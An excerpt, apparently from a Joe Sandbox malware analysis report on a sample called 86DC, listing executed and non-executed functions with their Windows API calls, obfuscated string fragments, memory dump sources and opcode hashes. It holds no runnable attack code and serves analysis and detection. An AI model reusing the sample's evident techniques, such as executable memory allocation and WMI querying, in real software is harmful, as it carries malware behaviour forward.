                                                                                                                                                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                                      • Instruction ID: 8cb0d109644ce714bdc84d03a3357bbc544987171c927014f260ece32c00e347
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26D0123114512877DB002A94DC09BCE7B1CDF09B66F008011FB0DDD180C770954046E5
                                                                                                                                                                                                                                                                                      Function 0043AB91 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 238 43ab91-43aba8 GetForegroundWindow call 43c7d0 241 43abad-43abce 238->241
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 0043AB9F
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ForegroundWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2020703349-0
                                                                                                                                                                                                                                                                                      • Opcode ID: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
                                                                                                                                                                                                                                                                                      • Instruction ID: 60e8b0f46bfb036eff5fe615915129b1fb2bd173e47bf556a6606a5c449cc706
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34E08C7EA406008BDB04DF20EC4A5517766B79A305B084039D903C37A6DB3DD816CA49
                                                                                                                                                                                                                                                                                      Function 00438E70 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 243 438e70-438e7c 244 438e83-438e8e call 43bf00 RtlFreeHeap 243->244 245 438e94-438e95 243->245 244->245
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(?,00000000,?,004127C7), ref: 00438E8E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
                                                                                                                                                                                                                                                                                      • Instruction ID: 85901e1c641484a1e9593b863e702362ecf9fc70d5eef9c3d2e46bbe4163b786
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 63D01235405526EBC6101F24FC06B863A54EF49321F030461B540AF076C734DC908AD8
                                                                                                                                                                                                                                                                                      Function 00438E47 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 248 438e47-438e4a 249 438e51-438e55 RtlAllocateHeap 248->249
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                      • Opcode ID: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
                                                                                                                                                                                                                                                                                      • Instruction ID: 4c59684187f8c9fc8ebab3782fe1e1f4842940d007367fb0e8ab7bd4dbd8a192
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0C0927C142211FBD2211B21AC5EF6B3E38FB83B63F104124F209580B287649011DA6E
                                                                                                                                                                                                                                                                                      Function 00438E51 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 250 438e51-438e55 RtlAllocateHeap
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
                                                                                                                                                                                                                                                                                      • Instruction ID: 3dd49d49275fbb255d04589a33f94784ad2ffd24471d3276aa8c957077778349
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8AA0223C002200EBC2200B20AC0EF2B3E38FB83B23F000030F00C080B283308000CA2E
                                                                                                                                                                                                                                                                                      Function 008D8F65 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 008D8FB6
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760070387.00000000008D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 008D8000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_8d8000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                                      • Instruction ID: b560369f75652eb40fc2e7a0bf2e28e7077ade26e31954562357536b3031c279
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7112B79A00208EFDB01DF98C985E98BBF5EF08351F058095F9489B362D771EA50DB80

                                                                                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                                                                                      Function 004361E0 Relevance: 32.1, APIs: 10, Strings: 8, Instructions: 636memorycomCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C), ref: 0043640E
                                                                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(FA46F8B5), ref: 0043646A
                                                                                                                                                                                                                                                                                      • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004364A7
                                                                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(w!s#), ref: 004364FB
                                                                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(A3q5), ref: 004365A1
                                                                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00436613
                                                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00436775
                                                                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 004367A0
                                                                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 004367A6
                                                                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 004367B3
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
                                                                                                                                                                                                                                                                                      • String ID: A;$BC$C$T'g)$X&c8$Y/9Q$w!s#$z7}9A3q5
                                                                                                                                                                                                                                                                                      • API String ID: 2485776651-4124187736
                                                                                                                                                                                                                                                                                      • Opcode ID: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
                                                                                                                                                                                                                                                                                      • Instruction ID: 522da010f1620deffab12e26d595bfb80e0736a5a48a815d81ab8756012ad252
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7112EC72A083019BD314CF28C881B6BBBE5FFC9304F15992DF595DB290D778D9058B9A
                                                                                                                                                                                                                                                                                      Function 00423A34 Relevance: 10.4, Strings: 8, Instructions: 446COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: 4%$>V$>V$<>$EG$IK$UW$|~
                                                                                                                                                                                                                                                                                      • API String ID: 0-2246970021
                                                                                                                                                                                                                                                                                      • Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                                                      • Instruction ID: f89536dd89445c36d0748b7bd4a9cf4b738649ea5c65e76590e6169531de8307
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C43242B0611B569FDB48CF26D580389BBB1FF45300F548698C9695FB4ADB35A8A2CFC0
                                                                                                                                                                                                                                                                                      Function 024C3C9B Relevance: 10.4, Strings: 8, Instructions: 446COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: 4%$>V$>V$<>$EG$IK$UW$|~
                                                                                                                                                                                                                                                                                      • API String ID: 0-2246970021
                                                                                                                                                                                                                                                                                      • Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                                                      • Instruction ID: 5b83408054e6837627d94385e11371328adee73dbb80cf533ed7779431d45b03
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 713243B4601B469FDB48CF2AD580389BBB1FF45300F648698C9595FB5ADB35A892CFC0
                                                                                                                                                                                                                                                                                      Function 00425E90 Relevance: 9.4, APIs: 1, Strings: 4, Instructions: 648COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: *mB$67$@iB$V3R5
                                                                                                                                                                                                                                                                                      • API String ID: 0-119712241
                                                                                                                                                                                                                                                                                      • Opcode ID: 2752cfb5aefe83a77e1e275bbb3611267d68b1f03f1cd38cb6bb80b62f128883
                                                                                                                                                                                                                                                                                      • Instruction ID: f8f986030c5c516667fa2fb6bcf2798bb7f33b75dff4277953ef0512ab11a316
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2752cfb5aefe83a77e1e275bbb3611267d68b1f03f1cd38cb6bb80b62f128883
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A2258716083548BC728DF68E85176FB7E1EFC5304F49893DE9868B392EB349905CB86
                                                                                                                                                                                                                                                                                      Function 004205B0 Relevance: 8.0, Strings: 6, Instructions: 481COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: &'$0c=e$2g1i$<k;m$B$wy
                                                                                                                                                                                                                                                                                      • API String ID: 0-2430453506
                                                                                                                                                                                                                                                                                      • Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                                                      • Instruction ID: efc43d6a55d29c5113b9513135886848320c4b4fba7a0b6b3d57c2edb9ba0087
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26D127B56083118BD724DF25D85276BB7F2EFE2314F58992CE4828B3A5F7789801CB46
                                                                                                                                                                                                                                                                                      Function 0042C64A Relevance: 7.8, Strings: 6, Instructions: 346COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: &=$0$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                                      • API String ID: 0-3264166258
                                                                                                                                                                                                                                                                                      • Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                                                      • Instruction ID: f15181a2a9622c2e50c414abf7a3ac4626398852fa6a8a653e4f6d86baaa0204
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62B1087020C3918AE324CF2994917BFBBD2AFD6304F588A6ED4D987391DB788449C757
                                                                                                                                                                                                                                                                                      Function 024CC8B1 Relevance: 7.8, Strings: 6, Instructions: 346COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: &=$0$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                                      • API String ID: 0-3264166258
                                                                                                                                                                                                                                                                                      • Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                                                      • Instruction ID: c178f22928673b026a7e7e8de46b4cab487007225332062ee64903f1244e28dc
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 89B1F87510C3818AE368CF29C4907BBBBD2AFD2314F288A6ED4DD8B391DB758549C716
                                                                                                                                                                                                                                                                                      Function 024A89F7 Relevance: 7.6, APIs: 5, Instructions: 146threadCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 024A8A1B
                                                                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 024A8A25
                                                                                                                                                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 024A8AC2
                                                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 024A8AD7
                                                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 024A8BD9
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4063528623-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                                                      • Instruction ID: c58823c02a31885ec6d39e16bdf74a65671f2f475a6676f7002b2bded0c6724e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E416B77F4431807D71CAEA58CA93AAB6969BC4314F0A803F6986AB390DE795C0656C1
                                                                                                                                                                                                                                                                                      Function 00422E93 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 394COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: )*$X9{;$r1B
                                                                                                                                                                                                                                                                                      • API String ID: 0-1001561910
                                                                                                                                                                                                                                                                                      • Opcode ID: 8dd660af85e9b30ff04e02c10e609101b9a09426abdb28fd85c75e4d1b9bc82c
                                                                                                                                                                                                                                                                                      • Instruction ID: a1479a56b64214e2a7fc54a03e2bd96b94a4879ed58cb61811aa9170273c6ab6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8dd660af85e9b30ff04e02c10e609101b9a09426abdb28fd85c75e4d1b9bc82c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 94D1BAB06083419FD3009F59E88166BBBE0FF96309F54892DF5818B351E3B8DA09CB5A
                                                                                                                                                                                                                                                                                      Function 0041BEA0 Relevance: 6.9, Strings: 5, Instructions: 684COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: -$C\$Iz$[^$de
                                                                                                                                                                                                                                                                                      • API String ID: 0-3020956940
                                                                                                                                                                                                                                                                                      • Opcode ID: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
                                                                                                                                                                                                                                                                                      • Instruction ID: e1ce7c89e45d16bcd91c54bb6943d2a9f79ffbc50f6667256eaf7ee8aaf95e0a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C012237654C3108FC314CFA8C8926ABBBE2EFD5314F18892DE4E58B391E7789505CB86
                                                                                                                                                                                                                                                                                      Function 024C0817 Relevance: 6.7, Strings: 5, Instructions: 481COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: &'$0c=e$2g1i$<k;m$wy
                                                                                                                                                                                                                                                                                      • API String ID: 0-3335612808
                                                                                                                                                                                                                                                                                      • Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                                                      • Instruction ID: a8bfb4297b9c75ca0f9219c6d5a2933cbf01f4fa7e00436f7aa57a517ea8efac
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7BD118B5608301CBD728DF29C85176BB7F2EF92318F18996DD4828B394F7799501CB52
                                                                                                                                                                                                                                                                                      Function 0042C6E4 Relevance: 6.6, Strings: 5, Instructions: 336COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
